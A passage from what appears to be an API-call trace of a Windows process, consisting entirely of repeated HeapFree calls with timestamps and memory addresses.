dwFlags=0x0, lpMem=0x2483720 | out: hHeap=0x460000) returned 1 [0111.484] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2496930 | out: hHeap=0x460000) returned 1 [0111.485] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x460000) returned 1 [0111.486] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x24bcd50 | out: hHeap=0x460000) returned 1 [0111.486] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x24cff60 | out: hHeap=0x460000) returned 1 [0111.486] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x24e3170 | out: hHeap=0x460000) returned 1 [0111.486] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x24f6380 | out: hHeap=0x460000) returned 1 [0111.486] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2509590 | out: hHeap=0x460000) returned 1 [0111.486] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x251c7a0 | out: hHeap=0x460000) returned 1 [0111.486] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x252f9b0 | out: hHeap=0x460000) returned 1 [0111.486] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2542bc0 | out: hHeap=0x460000) returned 1 [0111.487] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2560080 | out: hHeap=0x460000) returned 1 [0111.487] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2573290 | out: hHeap=0x460000) returned 1 [0111.487] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x25864a0 | out: hHeap=0x460000) returned 1 [0111.487] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x25996b0 | out: hHeap=0x460000) returned 1 [0111.487] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x25ac8c0 | out: hHeap=0x460000) returned 1 [0111.487] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x25bfad0 | out: hHeap=0x460000) returned 1 [0111.487] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x25d2ce0 | out: hHeap=0x460000) returned 1 [0111.487] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x25e5ef0 | out: hHeap=0x460000) returned 1 [0111.487] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x25f9100 | out: hHeap=0x460000) returned 1 [0111.487] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x260c310 | out: hHeap=0x460000) returned 1 [0111.497] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x261f520 | out: hHeap=0x460000) returned 1 [0111.499] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2632730 | out: hHeap=0x460000) returned 1 [0111.499] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2645940 | out: hHeap=0x460000) returned 1 [0111.499] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2658b50 | out: hHeap=0x460000) returned 1 [0111.502] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x266bd60 | out: hHeap=0x460000) returned 1 [0111.502] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x267ef70 | out: hHeap=0x460000) returned 1 [0111.502] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2692180 | out: hHeap=0x460000) returned 1 [0111.502] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x26a5390 | out: hHeap=0x460000) returned 1 [0111.502] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x26b85a0 | out: hHeap=0x460000) returned 1 [0111.502] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x26cb7b0 | out: hHeap=0x460000) returned 1 [0111.502] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x26de9c0 | out: hHeap=0x460000) returned 1 [0111.502] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x26f1bd0 | out: hHeap=0x460000) returned 1 [0111.502] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2704de0 | out: hHeap=0x460000) returned 1 [0111.502] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2717ff0 | out: hHeap=0x460000) returned 1 [0111.504] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x272b200 | out: hHeap=0x460000) returned 1 [0111.504] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x273e410 | out: hHeap=0x460000) returned 1 [0111.504] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2751620 | out: hHeap=0x460000) returned 1 [0111.504] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2764830 | out: hHeap=0x460000) returned 1 [0111.510] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2777a40 | out: hHeap=0x460000) returned 1 [0111.510] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x278ac50 | out: hHeap=0x460000) returned 1 [0111.510] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x279de60 | out: hHeap=0x460000) returned 1 [0111.510] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x27b1070 | out: hHeap=0x460000) returned 1 [0111.510] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x27c4280 | out: hHeap=0x460000) returned 1 [0111.510] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x27d7490 | out: hHeap=0x460000) returned 1 [0111.511] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x27ea6a0 | out: hHeap=0x460000) returned 1 [0111.511] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x27fd8b0 | out: hHeap=0x460000) returned 1 [0111.511] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2810ac0 | out: hHeap=0x460000) returned 1 [0111.511] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2823cd0 | out: hHeap=0x460000) returned 1 [0111.511] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2836ee0 | out: hHeap=0x460000) returned 1 [0111.511] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x284a0f0 | out: hHeap=0x460000) returned 1 [0111.511] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x285d300 | out: hHeap=0x460000) returned 1 [0111.511] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2870510 | out: hHeap=0x460000) returned 1 [0111.766] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2883720 | out: hHeap=0x460000) returned 1 [0111.766] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2896930 | out: hHeap=0x460000) returned 1 [0111.766] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x28a9b40 | out: hHeap=0x460000) returned 1 [0111.766] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x28bcd50 | out: hHeap=0x460000) returned 1 [0111.767] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x28cff60 | out: hHeap=0x460000) returned 1 [0111.768] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x28e3170 | out: hHeap=0x460000) returned 1 [0111.768] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x28f6380 | out: hHeap=0x460000) returned 1 [0111.768] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2909590 | out: hHeap=0x460000) returned 1 [0111.769] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x291c7a0 | out: hHeap=0x460000) returned 1 [0111.769] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x292f9b0 | out: hHeap=0x460000) returned 1 [0111.769] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2942bc0 | out: hHeap=0x460000) returned 1 [0111.769] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2955dd0 | out: hHeap=0x460000) returned 1 [0111.769] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2968fe0 | out: hHeap=0x460000) returned 1 [0111.769] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x297c1f0 | out: hHeap=0x460000) returned 1 [0111.773] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x298f400 | out: hHeap=0x460000) returned 1 [0111.773] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x29a2610 | out: hHeap=0x460000) returned 1 [0111.773] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x29b5820 | out: hHeap=0x460000) returned 1 [0111.774] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x29c8a30 | out: hHeap=0x460000) returned 1 [0111.774] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x29dbc40 | out: hHeap=0x460000) returned 1 [0111.776] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x29eee50 | out: hHeap=0x460000) returned 1 [0111.777] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2a02060 | out: hHeap=0x460000) returned 1 [0111.777] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2a15270 | out: hHeap=0x460000) returned 1 [0111.777] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2a28480 | out: hHeap=0x460000) returned 1 [0111.777] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2a3b690 | out: hHeap=0x460000) returned 1 [0111.777] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2a4e8a0 | out: hHeap=0x460000) returned 1 [0111.777] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2a61ab0 | out: hHeap=0x460000) returned 1 [0111.777] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2a74cc0 | out: hHeap=0x460000) returned 1 [0111.777] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2a87ed0 | out: hHeap=0x460000) returned 1 [0111.781] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2a9b0e0 | out: hHeap=0x460000) returned 1 [0111.781] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2aae2f0 | out: hHeap=0x460000) returned 1 [0111.781] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2ac1500 | out: hHeap=0x460000) returned 1 [0111.781] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2ad4710 | out: hHeap=0x460000) returned 1 [0111.782] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2ae7920 | out: hHeap=0x460000) returned 1 [0111.782] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2afab30 | out: hHeap=0x460000) returned 1 [0111.784] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2b0dd40 | out: hHeap=0x460000) returned 1 [0111.785] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2b20f50 | out: hHeap=0x460000) returned 1 [0111.785] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2b34160 | out: hHeap=0x460000) returned 1 [0111.785] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2b47370 | out: hHeap=0x460000) returned 1 [0111.785] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2b5a580 | out: hHeap=0x460000) returned 1 [0111.785] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2b6d790 | out: hHeap=0x460000) returned 1 [0111.785] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2b809a0 | out: hHeap=0x460000) returned 1 [0111.785] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2b93bb0 | out: hHeap=0x460000) returned 1 [0111.790] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2ba6dc0 | out: hHeap=0x460000) returned 1 [0111.790] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2bb9fd0 | out: hHeap=0x460000) returned 1 [0111.790] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2bcd1e0 | out: hHeap=0x460000) returned 1 [0111.790] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2be03f0 | out: hHeap=0x460000) returned 1 [0111.790] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2bf3600 | out: hHeap=0x460000) returned 1 [0111.790] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2c06810 | out: hHeap=0x460000) returned 1 [0111.792] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2c19a20 | out: hHeap=0x460000) returned 1 [0111.793] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2c2cc30 | out: hHeap=0x460000) returned 1 [0111.793] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2c3fe40 | out: hHeap=0x460000) returned 1 [0111.793] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2c53050 | out: hHeap=0x460000) returned 1 [0111.793] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2c66260 | out: hHeap=0x460000) returned 1 [0111.794] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2c79470 | out: hHeap=0x460000) returned 1 [0111.794] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2c8c680 | out: hHeap=0x460000) returned 1 [0111.794] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2c9f890 | out: hHeap=0x460000) returned 1 [0111.799] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2cb2aa0 | out: hHeap=0x460000) returned 1 [0111.799] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2cc5cb0 | out: hHeap=0x460000) returned 1 [0111.799] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2cd8ec0 | out: hHeap=0x460000) returned 1 [0111.799] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2cec0d0 | out: hHeap=0x460000) returned 1 [0111.799] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2cff2e0 | out: hHeap=0x460000) returned 1 [0112.030] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2d124f0 | out: hHeap=0x460000) returned 1 [0112.032] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2d25700 | out: hHeap=0x460000) returned 1 [0112.032] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2d38910 | out: hHeap=0x460000) returned 1 [0112.032] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2d60080 | out: hHeap=0x460000) returned 1 [0112.032] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2d73290 | out: hHeap=0x460000) returned 1 [0112.032] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2d864a0 | out: hHeap=0x460000) returned 1 [0112.032] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2d996b0 | out: hHeap=0x460000) returned 1 [0112.032] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2dac8c0 | out: hHeap=0x460000) returned 1 [0112.032] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2dbfad0 | out: hHeap=0x460000) returned 1 [0112.033] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2dd2ce0 | out: hHeap=0x460000) returned 1 [0112.033] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2de5ef0 | out: hHeap=0x460000) returned 1 [0112.033] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2df9100 | out: hHeap=0x460000) returned 1 [0112.045] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2e0c310 | out: hHeap=0x460000) returned 1 [0112.047] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2e1f520 | out: hHeap=0x460000) returned 1 [0112.047] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2e32730 | out: hHeap=0x460000) returned 1 [0112.047] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2e45940 | out: hHeap=0x460000) returned 1 [0112.047] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2e58b50 | out: hHeap=0x460000) returned 1 [0112.051] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2e6bd60 | out: hHeap=0x460000) returned 1 [0112.051] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2e7ef70 | out: hHeap=0x460000) returned 1 [0112.051] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2e92180 | out: hHeap=0x460000) returned 1 [0112.051] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2ea5390 | out: hHeap=0x460000) returned 1 [0112.051] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2eb85a0 | out: hHeap=0x460000) returned 1 [0112.051] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2ecb7b0 | out: hHeap=0x460000) returned 1 [0112.054] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2ede9c0 | out: hHeap=0x460000) returned 1 [0112.055] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2ef1bd0 | out: hHeap=0x460000) returned 1 [0112.055] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2f04de0 | out: hHeap=0x460000) returned 1 [0112.055] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2f17ff0 | out: hHeap=0x460000) returned 1 [0112.055] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2f2b200 | out: hHeap=0x460000) returned 1 [0112.055] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2f3e410 | out: hHeap=0x460000) returned 1 [0112.055] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2f51620 | out: hHeap=0x460000) returned 1 [0112.055] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2f64830 | out: hHeap=0x460000) returned 1 [0112.060] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2f77a40 | out: hHeap=0x460000) returned 1 [0112.060] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2f8ac50 | out: hHeap=0x460000) returned 1 [0112.061] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2f9de60 | out: hHeap=0x460000) returned 1 [0112.061] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2fb1070 | out: hHeap=0x460000) returned 1 [0112.061] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2fc4280 | out: hHeap=0x460000) returned 1 [0112.061] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2fd7490 | out: hHeap=0x460000) returned 1 [0112.062] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2fea6a0 | out: hHeap=0x460000) returned 1 [0112.062] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2ffd8b0 | out: hHeap=0x460000) returned 1 [0112.062] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x3010ac0 | out: hHeap=0x460000) returned 1 [0112.062] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x3023cd0 | out: hHeap=0x460000) returned 1 [0112.062] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x3036ee0 | out: hHeap=0x460000) returned 1 [0112.063] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x304a0f0 | out: hHeap=0x460000) returned 1 [0112.068] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x305d300 | out: hHeap=0x460000) returned 1 [0112.070] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x3070510 | out: hHeap=0x460000) returned 1 [0112.336] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x3083720 | out: hHeap=0x460000) returned 1 [0112.337] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x3096930 | out: hHeap=0x460000) returned 1 [0112.337] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x30a9b40 | out: hHeap=0x460000) returned 1 [0112.337] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x30bcd50 | out: hHeap=0x460000) returned 1 [0112.337] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x30cff60 | out: hHeap=0x460000) returned 1 [0112.337] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x30e3170 | out: hHeap=0x460000) returned 1 [0112.337] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x30f6380 | out: hHeap=0x460000) returned 1 [0112.340] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x3109590 | out: hHeap=0x460000) returned 1 [0112.341] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x311c7a0 | out: hHeap=0x460000) returned 1 [0112.341] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x312f9b0 | out: hHeap=0x460000) returned 1 [0112.341] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x3142bc0 | out: hHeap=0x460000) returned 1 [0112.341] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x3155dd0 | out: hHeap=0x460000) returned 1 [0112.341] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x3168fe0 | out: hHeap=0x460000) returned 1 [0112.341] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x317c1f0 | out: hHeap=0x460000) returned 1 [0112.345] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x318f400 | out: hHeap=0x460000) returned 1 [0112.345] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x31a2610 | out: hHeap=0x460000) returned 1 [0112.346] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x31b5820 | out: hHeap=0x460000) returned 1 [0112.347] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x31c8a30 | out: hHeap=0x460000) returned 1 [0112.347] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x31dbc40 | out: hHeap=0x460000) returned 1 [0112.347] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x31eee50 | out: hHeap=0x460000) returned 1 [0112.347] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x3202060 | out: hHeap=0x460000) returned 1 [0112.347] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x3215270 | out: hHeap=0x460000) returned 1 [0112.347] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x3228480 | out: hHeap=0x460000) returned 1 [0112.347] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x323b690 | out: hHeap=0x460000) returned 1 [0112.351] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x324e8a0 | out: hHeap=0x460000) returned 1 [0112.353] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x3261ab0 | out: hHeap=0x460000) returned 1 [0112.353] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x3274cc0 | out: hHeap=0x460000) returned 1 [0112.353] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x3287ed0 | out: hHeap=0x460000) returned 1 [0112.357] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x329b0e0 | out: hHeap=0x460000) returned 1 [0112.357] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x32ae2f0 | out: hHeap=0x460000) returned 1 [0112.357] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x32c1500 | out: hHeap=0x460000) returned 1 [0112.357] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x32d4710 | out: hHeap=0x460000) returned 1 [0112.359] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x32e7920 | out: hHeap=0x460000) returned 1 [0112.360] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x32fab30 | out: hHeap=0x460000) returned 1 [0112.360] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x330dd40 | out: hHeap=0x460000) returned 1 [0112.360] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x3320f50 | out: hHeap=0x460000) returned 1 [0112.360] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x3334160 | out: hHeap=0x460000) returned 1 [0112.360] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x3347370 | out: hHeap=0x460000) returned 1 [0112.360] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x335a580 | out: hHeap=0x460000) returned 1 [0112.363] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x336d790 | out: hHeap=0x460000) returned 1 [0112.367] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x33809a0 | out: hHeap=0x460000) returned 1 [0112.367] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x3393bb0 | out: hHeap=0x460000) returned 1 [0112.370] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x33a6dc0 | out: hHeap=0x460000) returned 1 [0112.370] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x33b9fd0 | out: hHeap=0x460000) returned 1 [0112.370] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x33cd1e0 | out: hHeap=0x460000) returned 1 [0112.370] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x33e03f0 | out: hHeap=0x460000) returned 1 [0112.583] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x33f3600 | out: hHeap=0x460000) returned 1 [0112.584] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x3406810 | out: hHeap=0x460000) returned 1 [0112.584] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x3419a20 | out: hHeap=0x460000) returned 1 [0112.584] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x342cc30 | out: hHeap=0x460000) returned 1 [0112.584] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x343fe40 | out: hHeap=0x460000) returned 1 [0112.584] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x3453050 | out: hHeap=0x460000) returned 1 [0112.588] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x3466260 | out: hHeap=0x460000) returned 1 [0112.590] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x3479470 | out: hHeap=0x460000) returned 1 [0112.590] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x348c680 | out: hHeap=0x460000) returned 1 [0112.590] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x349f890 | out: hHeap=0x460000) returned 1 [0112.594] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x34b2aa0 | out: hHeap=0x460000) returned 1 [0112.594] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x34c5cb0 | out: hHeap=0x460000) returned 1 [0112.595] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x34d8ec0 | out: hHeap=0x460000) returned 1 [0112.596] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x34ec0d0 | out: hHeap=0x460000) returned 1 [0112.596] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x34ff2e0 | out: hHeap=0x460000) returned 1 [0112.596] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x35124f0 | out: hHeap=0x460000) returned 1 [0112.596] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x3525700 | out: hHeap=0x460000) returned 1 [0112.599] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x3538910 | out: hHeap=0x460000) returned 1 [0112.600] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x354bb20 | out: hHeap=0x460000) returned 1 [0112.600] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x355ed30 | out: hHeap=0x460000) returned 1 [0112.600] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x3571f40 | out: hHeap=0x460000) returned 1 [0112.600] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x3585150 | out: hHeap=0x460000) returned 1 [0112.604] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x3598360 | out: hHeap=0x460000) returned 1 [0112.607] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x35ab570 | out: hHeap=0x460000) returned 1 [0112.610] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x35be780 | out: hHeap=0x460000) returned 1 [0112.610] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x35d1990 | out: hHeap=0x460000) returned 1 [0112.610] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x35e4ba0 | out: hHeap=0x460000) returned 1 [0112.612] HeapFree (in: hHeap=0x460000, dwFlags=0x0, 